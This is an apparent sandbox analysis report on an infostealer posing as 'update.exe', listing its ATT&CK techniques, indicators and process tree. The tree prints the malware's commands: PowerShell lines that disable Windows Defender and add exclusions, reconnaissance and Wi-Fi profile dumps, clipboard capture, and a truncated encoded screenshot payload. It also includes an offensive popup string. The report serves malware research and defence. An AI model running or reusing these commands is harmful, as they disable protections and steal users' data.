8194b74e9051bec1575bb257a43425a75b3bd2bfa6c0d0d015a1b0a3fed74459

Analysis

max time kernel
93s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-01-2025 20:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.exe
Size

6.0MB
MD5

63ca995dcd3c08cb381720745d52b935
SHA1

74c3cc792971fd8624cce93f2c8ba944bc11f975
SHA256

8194b74e9051bec1575bb257a43425a75b3bd2bfa6c0d0d015a1b0a3fed74459
SHA512

3d3c44aa5ef2c5c22c641ec15f5e2dcf2bac4abd2e661f69d350f6c94373dbda5facbdc2661cf5c5197c62acfc7a36a8fcce1edda288c5af0225cd726b057b1d
SSDEEP

98304:ceEtdFBgw6pamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RkPMpv3KMrTz:c9FIkeN/FJMIDJf0gsAGK4Rkkp5rTz

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4992	powershell.exe
4920	powershell.exe
4540	powershell.exe
4296	powershell.exe
2728	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4152	cmd.exe
3052	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2236	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe
1272	update.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3608	tasklist.exe
2952	tasklist.exe
5116	tasklist.exe
2712	tasklist.exe
1416	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b89-21.dat	upx
behavioral2/memory/1272-25-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp	upx
behavioral2/files/0x000a000000023b7c-27.dat	upx
behavioral2/files/0x000a000000023b87-30.dat	upx
behavioral2/memory/1272-48-0x00007FFD60170000-0x00007FFD6017F000-memory.dmp	upx
behavioral2/files/0x000a000000023b83-47.dat	upx
behavioral2/files/0x000a000000023b82-46.dat	upx
behavioral2/files/0x0031000000023b81-45.dat	upx
behavioral2/files/0x0031000000023b80-44.dat	upx
behavioral2/files/0x0031000000023b7f-43.dat	upx
behavioral2/files/0x000a000000023b7e-42.dat	upx
behavioral2/files/0x000a000000023b7d-41.dat	upx
behavioral2/files/0x000a000000023b7b-40.dat	upx
behavioral2/files/0x000a000000023b8e-39.dat	upx
behavioral2/files/0x000a000000023b8d-38.dat	upx
behavioral2/files/0x000a000000023b8c-37.dat	upx
behavioral2/files/0x000a000000023b88-34.dat	upx
behavioral2/files/0x000a000000023b86-33.dat	upx
behavioral2/memory/1272-31-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp	upx
behavioral2/memory/1272-54-0x00007FFD5AA70000-0x00007FFD5AA9D000-memory.dmp	upx
behavioral2/memory/1272-56-0x00007FFD5EAA0000-0x00007FFD5EAB9000-memory.dmp	upx
behavioral2/memory/1272-58-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp	upx
behavioral2/memory/1272-60-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp	upx
behavioral2/memory/1272-62-0x00007FFD5AA50000-0x00007FFD5AA69000-memory.dmp	upx
behavioral2/memory/1272-64-0x00007FFD5F4D0000-0x00007FFD5F4DD000-memory.dmp	upx
behavioral2/memory/1272-66-0x00007FFD5AA20000-0x00007FFD5AA4E000-memory.dmp	upx
behavioral2/memory/1272-72-0x00007FFD57050000-0x00007FFD57108000-memory.dmp	upx
behavioral2/memory/1272-71-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp	upx
behavioral2/memory/1272-70-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp	upx
behavioral2/memory/1272-74-0x00007FFD563B0000-0x00007FFD56725000-memory.dmp	upx
behavioral2/memory/1272-79-0x00007FFD5AF80000-0x00007FFD5AF8D000-memory.dmp	upx
behavioral2/memory/1272-78-0x00007FFD5AA70000-0x00007FFD5AA9D000-memory.dmp	upx
behavioral2/memory/1272-76-0x00007FFD5AA00000-0x00007FFD5AA14000-memory.dmp	upx
behavioral2/memory/1272-82-0x00007FFD56BE0000-0x00007FFD56CF8000-memory.dmp	upx
behavioral2/memory/1272-81-0x00007FFD5EAA0000-0x00007FFD5EAB9000-memory.dmp	upx
behavioral2/memory/1272-108-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp	upx
behavioral2/memory/1272-109-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp	upx
behavioral2/memory/1272-170-0x00007FFD5AA50000-0x00007FFD5AA69000-memory.dmp	upx
behavioral2/memory/1272-217-0x00007FFD5F4D0000-0x00007FFD5F4DD000-memory.dmp	upx
behavioral2/memory/1272-274-0x00007FFD5AA20000-0x00007FFD5AA4E000-memory.dmp	upx
behavioral2/memory/1272-276-0x00007FFD57050000-0x00007FFD57108000-memory.dmp	upx
behavioral2/memory/1272-292-0x00007FFD563B0000-0x00007FFD56725000-memory.dmp	upx
behavioral2/memory/1272-313-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp	upx
behavioral2/memory/1272-319-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp	upx
behavioral2/memory/1272-318-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp	upx
behavioral2/memory/1272-314-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp	upx
behavioral2/memory/1272-329-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp	upx
behavioral2/memory/1272-357-0x00007FFD56BE0000-0x00007FFD56CF8000-memory.dmp	upx
behavioral2/memory/1272-356-0x00007FFD5AF80000-0x00007FFD5AF8D000-memory.dmp	upx
behavioral2/memory/1272-355-0x00007FFD5AA00000-0x00007FFD5AA14000-memory.dmp	upx
behavioral2/memory/1272-354-0x00007FFD57050000-0x00007FFD57108000-memory.dmp	upx
behavioral2/memory/1272-353-0x00007FFD5AA20000-0x00007FFD5AA4E000-memory.dmp	upx
behavioral2/memory/1272-352-0x00007FFD5F4D0000-0x00007FFD5F4DD000-memory.dmp	upx
behavioral2/memory/1272-351-0x00007FFD5AA50000-0x00007FFD5AA69000-memory.dmp	upx
behavioral2/memory/1272-350-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp	upx
behavioral2/memory/1272-349-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp	upx
behavioral2/memory/1272-348-0x00007FFD5EAA0000-0x00007FFD5EAB9000-memory.dmp	upx
behavioral2/memory/1272-347-0x00007FFD5AA70000-0x00007FFD5AA9D000-memory.dmp	upx
behavioral2/memory/1272-346-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp	upx
behavioral2/memory/1272-345-0x00007FFD60170000-0x00007FFD6017F000-memory.dmp	upx
behavioral2/memory/1272-344-0x00007FFD563B0000-0x00007FFD56725000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1236	cmd.exe
4464	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3240	WMIC.exe
2264	WMIC.exe
3908	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1060	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4296	powershell.exe
4992	powershell.exe
4992	powershell.exe
4296	powershell.exe
2728	powershell.exe
2728	powershell.exe
3052	powershell.exe
3052	powershell.exe
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe
3052	powershell.exe
4920	powershell.exe
4920	powershell.exe
856	powershell.exe
856	powershell.exe
4540	powershell.exe
4540	powershell.exe
4416	powershell.exe
4416	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	tasklist.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1832	WMIC.exe
Token: SeSecurityPrivilege	1832	WMIC.exe
Token: SeTakeOwnershipPrivilege	1832	WMIC.exe
Token: SeLoadDriverPrivilege	1832	WMIC.exe
Token: SeSystemProfilePrivilege	1832	WMIC.exe
Token: SeSystemtimePrivilege	1832	WMIC.exe
Token: SeProfSingleProcessPrivilege	1832	WMIC.exe
Token: SeIncBasePriorityPrivilege	1832	WMIC.exe
Token: SeCreatePagefilePrivilege	1832	WMIC.exe
Token: SeBackupPrivilege	1832	WMIC.exe
Token: SeRestorePrivilege	1832	WMIC.exe
Token: SeShutdownPrivilege	1832	WMIC.exe
Token: SeDebugPrivilege	1832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1832	WMIC.exe
Token: SeRemoteShutdownPrivilege	1832	WMIC.exe
Token: SeUndockPrivilege	1832	WMIC.exe
Token: SeManageVolumePrivilege	1832	WMIC.exe
Token: 33	1832	WMIC.exe
Token: 34	1832	WMIC.exe
Token: 35	1832	WMIC.exe
Token: 36	1832	WMIC.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeIncreaseQuotaPrivilege	1832	WMIC.exe
Token: SeSecurityPrivilege	1832	WMIC.exe
Token: SeTakeOwnershipPrivilege	1832	WMIC.exe
Token: SeLoadDriverPrivilege	1832	WMIC.exe
Token: SeSystemProfilePrivilege	1832	WMIC.exe
Token: SeSystemtimePrivilege	1832	WMIC.exe
Token: SeProfSingleProcessPrivilege	1832	WMIC.exe
Token: SeIncBasePriorityPrivilege	1832	WMIC.exe
Token: SeCreatePagefilePrivilege	1832	WMIC.exe
Token: SeBackupPrivilege	1832	WMIC.exe
Token: SeRestorePrivilege	1832	WMIC.exe
Token: SeShutdownPrivilege	1832	WMIC.exe
Token: SeDebugPrivilege	1832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1832	WMIC.exe
Token: SeRemoteShutdownPrivilege	1832	WMIC.exe
Token: SeUndockPrivilege	1832	WMIC.exe
Token: SeManageVolumePrivilege	1832	WMIC.exe
Token: 33	1832	WMIC.exe
Token: 34	1832	WMIC.exe
Token: 35	1832	WMIC.exe
Token: 36	1832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3240	WMIC.exe
Token: SeSecurityPrivilege	3240	WMIC.exe
Token: SeTakeOwnershipPrivilege	3240	WMIC.exe
Token: SeLoadDriverPrivilege	3240	WMIC.exe
Token: SeSystemProfilePrivilege	3240	WMIC.exe
Token: SeSystemtimePrivilege	3240	WMIC.exe
Token: SeProfSingleProcessPrivilege	3240	WMIC.exe
Token: SeIncBasePriorityPrivilege	3240	WMIC.exe
Token: SeCreatePagefilePrivilege	3240	WMIC.exe
Token: SeBackupPrivilege	3240	WMIC.exe
Token: SeRestorePrivilege	3240	WMIC.exe
Token: SeShutdownPrivilege	3240	WMIC.exe
Token: SeDebugPrivilege	3240	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3240	WMIC.exe
Token: SeRemoteShutdownPrivilege	3240	WMIC.exe
Token: SeUndockPrivilege	3240	WMIC.exe
Token: SeManageVolumePrivilege	3240	WMIC.exe
Token: 33	3240	WMIC.exe
Token: 34	3240	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3404 wrote to memory of 1272	3404	update.exe	84
PID 3404 wrote to memory of 1272	3404	update.exe	84
PID 1272 wrote to memory of 4232	1272	update.exe	85
PID 1272 wrote to memory of 4232	1272	update.exe	85
PID 1272 wrote to memory of 2016	1272	update.exe	86
PID 1272 wrote to memory of 2016	1272	update.exe	86
PID 1272 wrote to memory of 2008	1272	update.exe	87
PID 1272 wrote to memory of 2008	1272	update.exe	87
PID 1272 wrote to memory of 2836	1272	update.exe	90
PID 1272 wrote to memory of 2836	1272	update.exe	90
PID 1272 wrote to memory of 3848	1272	update.exe	93
PID 1272 wrote to memory of 3848	1272	update.exe	93
PID 2008 wrote to memory of 536	2008	cmd.exe	94
PID 2008 wrote to memory of 536	2008	cmd.exe	94
PID 2836 wrote to memory of 2712	2836	cmd.exe	96
PID 2836 wrote to memory of 2712	2836	cmd.exe	96
PID 2016 wrote to memory of 4992	2016	cmd.exe	97
PID 2016 wrote to memory of 4992	2016	cmd.exe	97
PID 4232 wrote to memory of 4296	4232	cmd.exe	98
PID 4232 wrote to memory of 4296	4232	cmd.exe	98
PID 3848 wrote to memory of 1832	3848	cmd.exe	99
PID 3848 wrote to memory of 1832	3848	cmd.exe	99
PID 1272 wrote to memory of 4132	1272	update.exe	101
PID 1272 wrote to memory of 4132	1272	update.exe	101
PID 4132 wrote to memory of 1500	4132	cmd.exe	103
PID 4132 wrote to memory of 1500	4132	cmd.exe	103
PID 1272 wrote to memory of 2472	1272	update.exe	104
PID 1272 wrote to memory of 2472	1272	update.exe	104
PID 2472 wrote to memory of 2960	2472	cmd.exe	106
PID 2472 wrote to memory of 2960	2472	cmd.exe	106
PID 1272 wrote to memory of 2356	1272	update.exe	107
PID 1272 wrote to memory of 2356	1272	update.exe	107
PID 2356 wrote to memory of 3240	2356	cmd.exe	109
PID 2356 wrote to memory of 3240	2356	cmd.exe	109
PID 1272 wrote to memory of 4308	1272	update.exe	110
PID 1272 wrote to memory of 4308	1272	update.exe	110
PID 4308 wrote to memory of 2264	4308	cmd.exe	112
PID 4308 wrote to memory of 2264	4308	cmd.exe	112
PID 1272 wrote to memory of 424	1272	update.exe	113
PID 1272 wrote to memory of 424	1272	update.exe	113
PID 424 wrote to memory of 2728	424	cmd.exe	115
PID 424 wrote to memory of 2728	424	cmd.exe	115
PID 1272 wrote to memory of 944	1272	update.exe	116
PID 1272 wrote to memory of 944	1272	update.exe	116
PID 1272 wrote to memory of 1400	1272	update.exe	117
PID 1272 wrote to memory of 1400	1272	update.exe	117
PID 944 wrote to memory of 1416	944	cmd.exe	120
PID 944 wrote to memory of 1416	944	cmd.exe	120
PID 1272 wrote to memory of 460	1272	update.exe	123
PID 1272 wrote to memory of 460	1272	update.exe	123
PID 1272 wrote to memory of 4576	1272	update.exe	121
PID 1272 wrote to memory of 4576	1272	update.exe	121
PID 1272 wrote to memory of 836	1272	update.exe	126
PID 1272 wrote to memory of 836	1272	update.exe	126
PID 1272 wrote to memory of 4152	1272	update.exe	122
PID 1272 wrote to memory of 4152	1272	update.exe	122
PID 1272 wrote to memory of 1236	1272	update.exe	127
PID 1272 wrote to memory of 1236	1272	update.exe	127
PID 1400 wrote to memory of 3608	1400	cmd.exe	131
PID 1400 wrote to memory of 3608	1400	cmd.exe	131
PID 1272 wrote to memory of 3432	1272	update.exe	132
PID 1272 wrote to memory of 3432	1272	update.exe	132
PID 1272 wrote to memory of 4524	1272	update.exe	134
PID 1272 wrote to memory of 4524	1272	update.exe	134

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3068	attrib.exe
4884	attrib.exe

C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3404
- C:\Users\Admin\AppData\Local\Temp\update.exe
  "C:\Users\Admin\AppData\Local\Temp\update.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\update.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\update.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('rat', 0, 'niger', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2008
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('rat', 0, 'niger', 0+16);close()"
      4⤵
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4132
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:944
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1400
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4576
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:460
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:836
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1236
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3432
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4524
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAA